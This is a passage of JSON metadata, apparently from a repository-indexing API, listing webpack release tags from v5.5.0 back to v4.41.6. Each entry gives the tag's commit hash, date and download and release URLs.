api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_